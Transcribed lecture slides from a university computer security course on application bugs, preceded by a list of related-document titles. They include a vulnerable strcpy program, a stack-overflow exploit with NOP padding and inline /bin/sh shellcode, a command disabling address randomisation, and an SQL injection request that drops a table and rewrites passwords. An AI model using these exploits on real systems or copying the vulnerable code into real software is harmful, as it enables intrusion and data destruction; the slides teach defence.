COMP 3704 Computer Security

Similar documents
COMP 2355 Introduction to Systems Programming

CSE 127 Computer Security

Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena

CSE 127 Computer Security

CSE 127 Computer Security

Lecture 6: Buffer Overflow. CS 436/636/736 Spring Nitesh Saxena

Foundations of Network and Computer Security

Topics. What is a Buffer Overflow? Buffer Overflows

CSC 405 Computer Security Shellcode

Buffer overflows & friends CS642: Computer Security

Control Hijacking Attacks

Buffer Overflow. Jo, Heeseung

BUFFER OVERFLOW. Jo, Heeseung

Buffer Overflow Vulnerability

Buffer overflows & friends CS642: Computer Security

Foundations of Network and Computer Security

Buffer Overflows. CSC 482/582: Computer Security Slide #1

Software Security II: Memory Errors - Attacks & Defenses

Secure Software Development: Theory and Practice

Buffer Overflow Vulnerabilities

Foundations of Network and Computer Security

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Università Ca Foscari Venezia

The first Secure Programming Laboratory will be today! 3pm-6pm in Forrest Hill labs 1.B31, 1.B32.

Secure Programming Lecture 6: Memory Corruption IV (Countermeasures)

Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to

War Industries Presents: An Introduction to Programming for Hackers Part III - Advanced Variables & Flow Control.

Topics in Software Security Vulnerability

Buffer Overflow & Format Strings

Lecture 04 Control Flow II. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Based on Michael Bailey s ECE 422

Buffer Overflow Vulnerability Lab

Some recent security news

Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.

CS4264 Programming Assignment 1 Buffer Overflow Vulnerability Due 02/21/2018 at 5:00 PM EST Submit through CANVAS

Secure Systems Engineering

ISA564 SECURITY LAB. Code Injection Attacks

Buffer Overflow Attack

CS 645: Lecture 3 Software Vulnerabilities. Rachel Greenstadt July 3, 2013

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012

Memory corruption countermeasures

1 Recommended Readings

Introduction to Computer Systems , fall th Lecture, Sep. 28 th

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows)

Important From Last Time

CSE 565 Computer Security Fall 2018

Page 1. Today. Important From Last Time. Is the assembly code right? Is the assembly code right? Which compiler is right?

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

Architecture-level Security Vulnerabilities

CIS 551 / TCOM 401 Computer and Network Security. Spring 2007 Lecture 2

Important From Last Time

Is stack overflow still a problem?

Memory Corruption 101 From Primitives to Exploit

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts

Secure Programming Lecture 5: Memory Corruption III (Countermeasures)

Buffer overflow risks have been known for over 30 years. Is it still a problem? Try searching at to see.

ISA564 SECURITY LAB. Shellcode. George Mason University

Roadmap: Security in the software lifecycle. Memory corruption vulnerabilities

Lecture 08 Control-flow Hijacking Defenses

Sungkyunkwan University

Lab 2: Buffer Overflows

Buffer overflow background

CSc 466/566. Computer Security. 20 : Operating Systems Application Security

CS , Fall 2004 Exam 1

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

Advanced Buffer Overflow

Basic Buffer Overflows

Buffer overflow prevention, and other attacks

2 Resources Required. 3 Assignment Tasks. 3.1 Initial setup

CSE 509: Computer Security

One-Slide Summary. Lecture Outline. Language Security

20: Exploits and Containment

Computer Systems CEN591(502) Fall 2011

Shell Code For Beginners

CSC 438 Systems and Software Security, Spring 2014 Instructor: Dr. Natarajan Meghanathan Question Bank for Module 6: Software Security Attacks

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

CYSE 411/AIT681 Secure Software Engineering Topic #12. Secure Coding: Formatted Output

2/9/18. CYSE 411/AIT681 Secure Software Engineering. Readings. Secure Coding. This lecture: String management Pointer Subterfuge

Advanced Buffer Overflow

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP

CS 392/681 Lab 6 Experiencing Buffer Overflows and Format String Vulnerabilities

putting m bytes into a buffer of size n, for m>n corrupts the surrounding memory check size of data before/when writing

Buffer Overflow Attack

Secure C Coding...yeah right. Andrew Zonenberg Alex Radocea

CSE 565 Computer Security Fall 2018

Other array problems. Integer overflow. Outline. Integer overflow example. Signed and unsigned

Linux Memory Layout The course that gives CMU its Zip! Machine-Level Programming IV: Miscellaneous Topics Sept. 24, Text & Stack Example

Security and Privacy in Computer Systems. Lecture 5: Application Program Security

CNIT 127: Exploit Development. Ch 3: Shellcode. Updated

UMSSIA LECTURE I: SOFTWARE SECURITY

buffer overflow exploitation

Outline. Classic races: files in /tmp. Race conditions. TOCTTOU example. TOCTTOU gaps. Vulnerabilities in OS interaction

Lecture 05 Integer overflow. Stephen Checkoway University of Illinois at Chicago

(Early) Memory Corruption Attacks

CYSE 411/AIT681 Secure Software Engineering Topic #8. Secure Coding: Pointer Subterfuge

Architecture-level Security Vulnerabilities. Julian Stecklina

TI2725-C, C programming lab, course

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

CIS 2107 Computer Systems and Low-Level Programming Spring 2012 Final

Secure Coding Topics. Readings. CYSE 411/AIT681 Secure Software Engineering. Pointer Subterfuge. Outline. Data Locations (cont d) Data Locations

Transcription:

COMP 3704 Computer Security christian@grothoff.org http://grothoff.org/christian/ 1

Application Security Suppose...... protocol design is secure.... cryptographic primitives are secure.... users / key is secure.... operating system / network is secure.... hardware is secure. But what about the 1.5 MLOC in your application? 2

What is a Security Bug? A bug that allows...... arbitrary code execution... bypassing data access restrictions... denial of service to legitimate users... unexpected resource consumption 3

What is a Security Bug? A bug that allows...... arbitrary code execution... bypassing data access restrictions... denial of service to legitimate users... unexpected resource consumption Almost any bug can be a security bug! 4

Major Security Bug Categories Memory Corruption Arithmetic overflows Data races SQL injection Cross-site scripting 5

Memory Corruption Applies only to certain languages Hard to find May allow arbitrary code execution 6

Arithmetic overflows Applies to most languages Even harder to find Can cause bypassing of access restrictions and DoS Unlikely to directly allow arbitrary code execution Could be used to trigger memory corruption 7

Data races Applies only to certain applications Easy to find, non-trivial to avoid Generally used to corrupt data Could be used to trigger memory corruption, but due to non-determinism can be tricky to exploit 8

SQL Injection Applies only to certain applications Easy to find, often easy to avoid (prepared statements!) Used to bypass access restrictions, corrupt data Usually impossible to use for non-sql code execution 9

XSS Applies only to certain applications Easily used on unsuspecting users Probably phisher s favourite Sometimes combined with attacks on browser security itself Browser s sandbox should prevent the worst 10

Minor Security Bugs Memory leaks Socket/file-descriptor leaks Excessive CPU consumption Excessive disk/io consumption Segmentation faults due to NULL dereference 11

Types of Memory Corruption Bugs Buffer Overflow Double-free Use after free Missing string termination (strncpy anyone?) Use of uninitialized data 12

Buffer Overflows: The Bug void func(char *str) { char buffer[4]; printf("%p\n", &buffer); strcpy(buffer,str); } int main(int argc, char** argv) { func(argv[1]); printf("this is the next instruction\n"); return 0; } 13

Buffer Overflows: The Exploit (1/5) Need to implement exploit code in assembly Let the C compiler do it for you! gcc -S filename.c (gdb) disassemble dup2 www.metasploit.com shellcode database 14

Buffer Overflows: The Exploit (2/5) Problems that need to be overcome: Characters of value 0 in exploit code find alternative assembly sequence Unknown absolute address of constants use reletive CALL with absolute return left on stack) Absolute address of exploit code is uncertain prefix code with sequence of NOPs 15

Buffer Overflows: The Exploit (3/5) #define BSIZE 48 #define PD (BSIZE + 28) int main(int argc, char** argv) { char s[pd+1]; memset(s, 0x90, PD); s[pd] = \0 ; ((void**)&s[12])[0]=(void*)0xbffff3f0+20; memcpy(&s[pd - BSIZE], &badness, BSIZE); execl("vulnerable", "vulnerable", s, NULL); return 0; } 16

Buffer Overflows: The Exploit (4/5) static void badness() { asm ( "jmp TARGET \n" "HOME: \n" "popl %esi \n\t" "movl %esi,0x8(%esi) \n\t" "xorl %eax,%eax \n\t" "movb %eax,0x7(%esi) \n\t" "movl %eax,0xc(%esi) \n\t" "movb $0xb,%al \n\t" "movl %esi,%ebx \n\t" "leal 0x8(%esi),%ecx \n\t" "leal 0xc(%esi),%edx \n\t" "int $0x80 \n\t" "xorl %ebx,%ebx \n\t" "movl %ebx,%eax \n\t" "inc %eax \n\t" "int $0x80 \n" "TARGET: \n" "call HOME \n\t" ".string \"/bin/sh\""); } 17

Buffer Overflows: The Exploit (5/5) Good candidates for SVR4 calls causing overflows are: strcat, strcpy sprintf. vsprintf scanf (with %s) gets 18

The Fix: PAX/Linux 2.6 Randomize start of stack Randomize addresses returned by mmap Hard to predict offset of code However, randomization is limited on 32-bit machines! 19

Disabling Address Space Randomization # echo 0 > /proc/sys/kernel/randomize_va_space You may want to do this if you want to develop simple buffer overflow exploits on Linux 2.6! Helpful gdb commands: (gdb) si (gdb) x/10i $pc 20

Circumventing the Fix Could be possible to use larger exploit buffer with more NOPs to increase chances of success Can still use overflow to corrupt program data Can still use overflow for DoS Can still exploit Microsoft systems Still a serious security hole! 21

Arithmetic Overflow: The Bug int main(int argc, char ** argv) { unsigned short s; } for (s=0;s<argc;s++) printf(argv[s]); return 0; 22

Arithmetic Overflow: The Exploit Most common are 32-bit integer overflows Useful if particular values cause issues, for example, malloc(0) causes bugs with certain implementations of malloc Loop variables (causing infinite loops / DoS) and integers used for access permissions are also important targets Does the program validate the range of integers read from IO and used in computations? Is the range validation code correct? 23

Example int a = read(); int b = 42; if ( (a <= 0) (0x7FFFFFFF / a < b) ) abort(); /* invalid input */ int o = a * b; Is o guaranteed to be positive? 24

Arithmetic Overflow: The Fix LISP 25

SQL Injection: The Bug $username = $_POST[ username ]; $query = INSERT INTO t VALUES(\". $username. \") ); mysql_query($query); 26

SQL Injection: The Exploit wget http://page/?username= me\"); DROP t;update auth SET (password=\" 27

SQL Injection: The Fix s = INSERT INTO t VALUES(?) ; mysql_stmt_prepare(s, stmt) mysql_stmt_bind_param(stmt, $username) mysql_stmt_execute(stmt); 28

Summary Most bugs can be security issues Languages and operating systems can help Input validation is difficult If possible, avoid obtaining security by input validation! 29

Questions? 30

Problem You found a security problem in some software. How do you go about fixing it... If the software is yours? If the software is free software? If the software is commercial? If the software is used by DHS!? 31

Problem You have published software. How do you handle reports about security problems with your software? 32

Problem Justin becomes a judge on the supreme court. 33

Problem Justin becomes a judge on the supreme court. What is constitutionally protected (ethical!?) security research? What is responsible disclosure? When do you start holding vendors responsible for security problems? 34

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback